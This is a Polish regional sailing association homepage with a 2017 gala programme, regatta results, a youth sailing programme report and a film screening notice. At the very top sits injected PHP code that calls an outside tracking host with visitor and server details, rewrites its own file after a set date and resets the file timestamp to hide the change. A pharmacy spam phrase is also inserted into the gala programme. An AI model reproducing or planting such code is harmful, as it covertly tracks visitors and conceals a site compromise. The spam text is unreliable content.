check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Wielkopolski Okręgowy Związek Żeglarski

Witamy na stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home

ZAPRASZAMY NA
WIELKOPOLSKĄ GALĘ ŻEGLARSKĄ 2017

Gala odbędzie się w dniu 17 listopada 2017 o godz. 18.30
w auli /A004 parter/ Collegium Da Vinci, ul. Gen. Kutrzeby 10.

PROGRAM:

  1. Rozpoczęcie uroczystości i przywitanie gości

  2. Ogłoszenie wyników i wręczenie Nagrody Roku ZŁOTA OMEGA 2017 w

    kategoriach: Osiągnięcie Sportowe Roku, Morski Rejs Roku,

    Śródlądowy Rejs Roku, Regaty Roku, Impreza – Wydarzenie Roku,

    Przystań Żeglarska Roku

  3. Wręczenie odznaczeń „Za zasługi dla Żeglarstwa Wielkopolskiego”

  4. Wystąpienie przedstawicieli Floty Zachodniej DN z okazji 50-lecia klasy

    DN w Polsce.

  5. Ogłoszenie wyników i wręczenie Pucharów Prezesa WOZŻ w klasach

    sportowych Optimist, BiC Techno, RS:X, Europa, Laser 4,7,

    Laser Radial, Laser Standard, Słonka, OK Dinghy,

    Finn oraz klasyfikacji klubowej za cures canadian generic viagra online sezon 2017

  6. Ogłoszenie wyników i wręczenie Pucharów Prezesa WOZŻ

    w klasach sportowo-rekreacyjnych T-1, T-2, T-3, T-R i Omega za sezon 2017

  7. Wręczenia nagród dla armatorów jachtów za zdobyte punkty w końcowej klasyfikacji

  8. Ogłoszenie wyników i wręczenie pucharów za regaty Błękitna Wstęga Jeziora Kierskiego.


Wjazd na parking od ul. Na Podgórnik

 

WYNIKI


Finn


1 JAROCKI Marek AZS Poznań

2 REICHELT Juliusz ŻLKS Poznań

3 ROMANOWSKI Andrzej AZS Poznań


OKD

1 PAWLACZYK Paweł JKW Poznań

2 KUJAWIŃSKI Donat AZS Poznań

3 PAWŁOWSKI Dominik AZS Poznań


Laser standard

1 MARCINIAK Jakub JKW Poznań

2 ŻEBERSKI Patryk PKM Lok Poznań

3 POLACZYK Hubert KŻ Mewa Poznań


BICTECHNO

1 WAWRZYNIAK Pola AZS Poznań

2 ŚWIĄTKOWSKI Jakub AZS Poznań

3 BANACH Agata AZS Poznań


RS:X

1 CZURYŁO Zuzanna AZS Poznań

2 PAWŁOWSKI Kajetan AZS Poznań

3 POPŁONYK Marta AZS Poznań


OPP CHŁOPCY

1 MŁODZIANOWSKI KACPER AZS POZNAŃ

2 MARCINIAK STEFAN AZS POZNAŃ

3 SOPATA ANTONI AZS POZNAŃ

4 ROSSA SZYMON ŻMKS

5 GRZESIEK MICHAŁ ŻMKS POZNAŃ

6 KORCZ KACPER ŻMKS POZNAŃ


OPP DZIEWCZĘTA

1 WISZNIOWSKA HANNA JKW POZNAŃ

2 POSPIESZNA ZOFIA AZS POZNAŃ

3 GAJDZIŃSKA KAROLINA AZS POZNAŃ

4 BORUCKA ALEKSANDRA AZS POZNAŃ

5 PRZYBYŁEK ALICJA AZS POZNAŃ

6 WITCZAK ANNA ŻLKS KIEKRZ


SŁONKA

1

SOKOŁOWSKI Łukasz

SOKOŁOWSKI Piotr

ŻLKS Poznań

2

MARCZAK Dawid

PĘDZIŃSKI Bartosz

ŻLKS Poznań

3

POLACZYK Szymon

POLACZYK Sylwia

KŻ MEWA P-ń


LASER RADIAL

1 POLACZYK Hubert KŻ Mewa

2 KOTOWSKI Wojciech ŻMKS Poznań

3 MICHALSKA Anna PKM LOK POZNAŃ


LASER 4,7

1 POLACZYK Gerard KŻ Mewa

2 ŚLUSARSKA Nawojka KŻ Mewa

3 SZUBERT Rafał ŻMKS Poznań

 


KLUBOWO

 

AZS POZNZŃ

ŻMKS POZNZŃ

JKW POZNZŃ

 

 

 

 

 

 

 

 
MISTRZOSTWA WOJEWÓDZTWA WLKP. JACHTÓW TURYSTYCZNYCH
 16-17.09.2017
WYNIKI  KOŃCOWE
KL.   T -1
M-ce Klasa Nr/ Nazwa Sternik Załoga Klub Pkt
1 Corwetta Zorro Grzegorz Wawrzyniak Tomasz Herward, Andrzej Brzózka JKW 6
2 Orion Blask Oriona Robert  Unruh Piotr Napierała Wagabunda 7
3 Spark 550 Pirania Rafał Zakrzewski Przemysław Wierciński JKW 7
4 Bez - 4 Rolek Karol Tomaszewski Grzegorz Juniczak Posnania 10
KL.   T - 3
1 Saturn 720 Vita Linia 17 Dominik Mania Leszek Mania.Łukasz Sokołowski ŻMKS 4
2 Sasanka 620 Krystyna Jerzy Wojtera Iwona Szeląg, Karol Zentner JKW 5
3 Saturn 720 CHERRY Wojciech Nowak Henryk Bereś, Tadeusz Dąbek JKW 9
4 Sasanka 620 LIN PO  101 Jerzy Mainka Władysław Sobański RJKP 12
KL.  Omega  turystyczna
1 Omega Pol  132 Roman Czajkowski Olgierd Stieler RJKP 3
2 Omega Pol  21 Marcin Batko Marian Kassner Wagabunda 6
3 Omega PO 146 Dariusz Żeberski Jolanta  Żeberska PKM LOK 9
4 Omega Kanalia Mariusz Skowroński Halina  Skowrońska PKM LOK 12
5 Omega Zefir LS 56 Krzysztof Kumkowski Paweł Banaś, Remigiusz Cwojdziński PKM LOK 19
6 Omega PO  339 Ryszard Pakulski Andreas  Sikorski JKW 19
Rozegrano 3 na zaplanowane  5 wyścigów przy wietrze  2-3,5 m/sek.
Poznań, dnia 17.09.2017. SG  Regat  Józef  Mikulski
 

SPRAWOZDANIE ENERGA SAILING 2016 W POZNANIU

Na początku stycznia zostały odwiedzone wszystkie szkoły, w których odbyły się otwarte zajęcia z żeglarstwa w listopadzie 2015 roku, w celu przypomnienia o zbliżającym się naborze do programu. W wyniku przeprowadzonej rekrutacji w Poznaniu do programu przyjęto 101 dzieci (Do programu przystąpiło w sumie 101 dzieci (38 dziewczynek, 63 chłopców) oraz 6 dzieci na listę rezerwową. Do programu przystąpiły 4 szkoły : SP z Tarnowa Podgórnego, Sp nr 28 w Poznaniu, SP nr 90 w Poznaniu oraz SP nr 83 „ŁEJERY” w Poznaniu.
Zajęcia odbywały się na terenie JKW nad Jeziorem Kierskim od poniedziałku do piątku w godz. 17.00-20.00.
Główni instruktorzy to: Anna Zabłocka, Paweł Kurzawa oraz Agata Lehmann, instruktorzy wspomagający: Filadelfia Bachorz, Wojciech Arczewski oraz Michał Prończuk.
Zakres zrealizowanego materiału w grupach: podstawowa wiedza z zakresu żeglarstwa, budowa optimista, bezpieczeństwo nad wodą, podstawowe węzły, teoria żeglowania, zdrowy tryb życia omawiany przy okazji zajęć ogólnorozwojowych. Realizacja programu wg. harmonogramu obowiązującego we wszystkich województwach.
Zorganizowane zostały grupowe badania lekarskie w klinice REHASPORT, z których skorzystało 95% dzieci, reszta badania wykonała we własnym zakresie.

 

Więcej…

 

Wodniacko - marynistyczno - żeglarskie Kino „Wodna” 

w ramach programu Centrum Warte Poznania finansowanego przez Urząd Miasta Poznania

 

Bezpłatna projekcja filmu: Antarktyczna podróż Sir Ernesta Shackletona, 2010, 90 minut, USA

Ul. Wodna 8/9 (Wielkopolski OZŻ)

Piątek 21.10.2016 g. 20:00

 

Antarktyczna podróż Sir Ernesta Shackletona, 2010, 90 minut, USA

Wrzesień, 1914. Ernest Shackleton i 27 śmiałków ruszają na podbój Antarktydy z zamiarem połączenia mórz Rossa i Weddella śladem ludzkich stóp. Po sześciu tygodniach zmagań z oceanem trójmasztowiec „Endurance” zostaje uwięziony w paku lodowym na kolejnych 10 miesięcy. Dryfujące, niezdolna do samodzielnej żeglugi brygantyna zostaje zmiażdżona przez krę, zostawiając rozbitków na pastwę antarktycznej zimy. 
Shackleton podejmuje szaleńczą próbę przebicia się do Georgii Południowej najpierw pieszo, następnie w 6 metrowej żaglowej szalupie ratunkowej „James Caird”. Alfred Lansing na podstawie dokumentów, dzienników i rozmów z uczestnikami odtwarza przebieg wyprawy dzień po dniu, dając świadectwo ludzkiej determinacji i bohaterstwa, które i wówczas, i dzisiaj jest prawie niemożliwe do powtórzenia.

 

Antarktyczna podroz 2

 

Więcej…

 

Poznań Know How

Energa Sailing

Przeszukaj nasz serwis
Archiwum

  Archiwalna strona pozz.poznan.pl
  Wyniki regat, informacje, komunikaty
  za okres 2004-2012.